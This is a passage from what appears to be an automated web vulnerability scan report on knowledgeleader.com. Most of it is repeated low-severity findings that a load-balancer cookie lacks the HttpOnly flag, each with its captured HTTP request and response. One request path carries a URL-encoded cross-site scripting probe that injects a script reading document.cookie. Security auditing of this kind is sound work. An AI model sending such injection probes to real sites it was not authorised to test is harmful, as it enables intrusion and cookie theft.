Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:26 GMT; path=/

......JFIF.....H.H.....cExif..II*...........................b...........j...(...........1.......r...2...........i.................
..'....
..'..Adobe Photoshop CS2 Windows.2007:05:16 16:20:37.........
...[SNIP]...

6.29. http://www.knowledgeleader.com/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

6.30. http://www.knowledgeleader.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:57 GMT
Content-Type: image/x-icon
Content-Length: 42166
Last-Modified: Wed, 06 Jun 2007 17:42:22 GMT
Accept-Ranges: bytes
Expires: Thu, 26 Apr 2012 23:59:59 GMT
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:12 GMT; path=/

....
.00......h....... ......................(.... ..00.............. ......................h...n"..@@.... .(B...'..00.... ..%...i.. .... ............... .h...N...(...0...`.........................
...[SNIP]...

6.31. http://www.knowledgeleader.com/icons/KnowledgeLeader/Contact.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Contact.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Contact.css HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:46:55 GMT
Content-Type: text/css
Content-Length: 316
Last-Modified: Mon, 13 Aug 2007 18:11:13 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:11 GMT; path=/

body {
   background: #cacaae; }

.PageHead {
   font-weight: bold;
   font-size: 36px;
   padding: 10px 10px 5px 10px;
   border-bottom: 7px solid #ffffff; }

.LabelRequired { font-size: 11px; width:
...[SNIP]...

6.32. http://www.knowledgeleader.com/icons/KnowledgeLeader/Guest+Home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Guest+Home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Guest+Home.css HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:32 GMT
Content-Type: text/css
Content-Length: 1370
Last-Modified: Wed, 09 Apr 2008 20:46:27 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:48 GMT; path=/

#Welcome {
   margin: 0px;
   padding: 0px 0px 10px 0px; }

#MastheadTools {
   margin-right: 0px; }

#MastheadSearch {
   margin-right: 0px; }

#HomeFreeTrial {
   margin: 0px;
   padding: 0px;

...[SNIP]...

6.33. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/Blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/Blank.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/Blank.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Sat, 11 Feb 2006 11:29:56 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

GIF89a.............!.......,...........D..;

6.34. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/Bullet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/Bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/Bullet.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Content-Type: image/gif
Content-Length: 75
Last-Modified: Tue, 14 Feb 2006 23:15:08 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

GIF89a.. .......000YYUjji............!.......,...... ....8@..L<F$.!NK.TT..;

6.35. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/Check_3a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/Check_3a.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/Check_3a.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:19 GMT
Content-Type: image/gif
Content-Length: 1141
Last-Modified: Fri, 12 Dec 2008 07:06:00 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:34 GMT; path=/

GIF89a................QTW9:;%7C..&Rx.7Qc6Oai..h..f..`.._.._..[..<Xk9Tf4L]2IY.."k..j..Z..Y..6O`-BP,@N#3>i..r..z..w..t...........`z....`y.{.....dv....06:...VY[cfh.!( 0:i..Gj.Ccxj..V.Ko.Il.Gi%7B!1;i..`
...[SNIP]...

6.36. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/Facebook.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/Facebook.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/Facebook.jpg HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:37 GMT
Content-Type: image/jpeg
Content-Length: 1815
Last-Modified: Mon, 30 Mar 2009 20:58:27 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:52 GMT; path=/

......JFIF.....`.`......LEAD Technologies Inc. V1.01................ .. ................... $.' "+"..(6(+/1343.&8<82<.231.. .
...1!.!11111111111111111111111111111111111111111111111111.............
...[SNIP]...

6.37. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/KL_Icon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/KL_Icon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/KL_Icon.ico HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:40 GMT
Content-Type: image/x-icon
Content-Length: 2862
Last-Modified: Tue, 07 Feb 2006 00:42:54 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:56 GMT; path=/

............ .h...6...........h...............(....
..(....... ..... ......%...................................................................................e1..e1..e1..e1..e1..e1..e1..e1.zzz.zzz.zz
...[SNIP]...

6.38. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/KnowledgeLeader_Logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/KnowledgeLeader_Logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/KnowledgeLeader_Logo.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Content-Type: image/gif
Content-Length: 8340
Last-Modified: Fri, 04 Aug 2006 00:20:57 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

GIF89a..#.......................................................Af|.Ka0Xm2\q1Zo2[p1Ym4]r4[o6]r9`t8]q:`s;at<bu>dx=cv@fz>cvAgz@exVv.Z{.Yy.Zz.Yy.^~.]|.f..r..x................................*Uj0Zm0Xj2[n3
...[SNIP]...

6.39. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/LinkedIn.JPG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/LinkedIn.JPG

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/LinkedIn.JPG HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:37 GMT
Content-Type: image/jpeg
Content-Length: 18040
Last-Modified: Tue, 21 Apr 2009 21:27:42 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:52 GMT; path=/

......JFIF..............LEAD Technologies Inc. V1.01................ .. ................... $.' "+"..(6(+/1343.&8<82<.231.. .
...1!.!11111111111111111111111111111111111111111111111111.............
...[SNIP]...

6.40. http://www.knowledgeleader.com/icons/KnowledgeLeader/Images/RSS.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/Images/RSS.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/Images/RSS.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Content-Type: image/gif
Content-Length: 209
Last-Modified: Wed, 15 Feb 2006 00:47:44 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

GIF89a.........<..............r..}...........................!.......,..........~0.I..A.......d...%...d.6..2p(.p.8 ..aS..N7@n.a...#.......A@. .....+.Y.y.=H..@l....o.-...S-].?R+S.1..t8R3.a=.dV&.!v..9.
...[SNIP]...

6.41. http://www.knowledgeleader.com/icons/KnowledgeLeader/KLPlus.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/KLPlus.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/KLPlus.css HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:08 GMT
Content-Type: text/css
Content-Length: 1340
Last-Modified: Mon, 01 Dec 2008 23:21:25 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:24 GMT; path=/

#Welcome {
   margin: 0px;
   padding: 0px 0px 10px 0px; }

.HomeFeatureStory {
   margin: 0px;
   padding: 0px 10px 10px 0px; }

.HomeNewThisWeek {
   width: 50%;
   margin: 0px;
   padding: 0px;
   bac
...[SNIP]...

6.42. http://www.knowledgeleader.com/icons/KnowledgeLeader/pngfix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/pngfix.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/pngfix.js HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:10 GMT
Content-Type: application/x-javascript
Content-Length: 1573
Last-Modified: Fri, 02 May 2008 00:04:10 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:25 GMT; path=/

/*

Correctly handle PNG transparency in Win IE 5.5 & 6.
http://homepage.ntlworld.com/bobosola. Updated 18-Jan-2006.

Use in <HEAD> with DEFER keyword wrapped in conditional comments:
<!--[if l
...[SNIP]...

6.43. http://www.knowledgeleader.com/icons/KnowledgeLeader/xGlobal.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/xGlobal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/xGlobal.css HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:31 GMT
Content-Type: text/css
Content-Length: 10803
Last-Modified: Mon, 17 Aug 2009 21:43:37 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:46 GMT; path=/

/*

   KL Blue: #396a8b;
   Light Blue: #6a9cbd;
   Gray Blue: #d8e1e8;
   Khaki: #cacaae;
   Black: #000000;
   Link Blue: #003366;
   Dark Gray: #333333;
   Light Gray: #cccccc;

*/

body { margin: 0px
...[SNIP]...

6.44. http://www.knowledgeleader.com/icons/KnowledgeLeader/xGlobal.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/KnowledgeLeader/xGlobal.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/KnowledgeLeader/xGlobal.js HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:32 GMT
Content-Type: application/x-javascript
Content-Length: 6824
Last-Modified: Wed, 30 Sep 2009 23:28:06 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:48 GMT; path=/

function LogoHover(idName, state) {
   myObject = GetObject ( idName );
   if (state == 'On') {
       myObject.style.cursor = 'pointer';
       myObject.src=logo2.src
   } else {
       myObject.style.cursor = 'aut
...[SNIP]...

6.45. http://www.knowledgeleader.com/icons/ecblank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/icons/ecblank.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/ecblank.gif HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:34 GMT
Content-Type: image/gif
Content-Length: 45
Last-Modified: Wed, 18 Nov 1998 21:12:02 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:50 GMT; path=/

GIF89a.............!.......,................;

6.46. http://www.knowledgeleader.com/names.nsf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/names.nsf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /names.nsf HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 945
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body text="#000000" bgcolor="white" style="margin:0px; padding:0px" onload="//var fullURL = window.location.href;
...[SNIP]...

7. File upload functionality previous next
There are 2 instances of this issue:

/KnowledgeLeader/Registration.nsf/Registration
/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
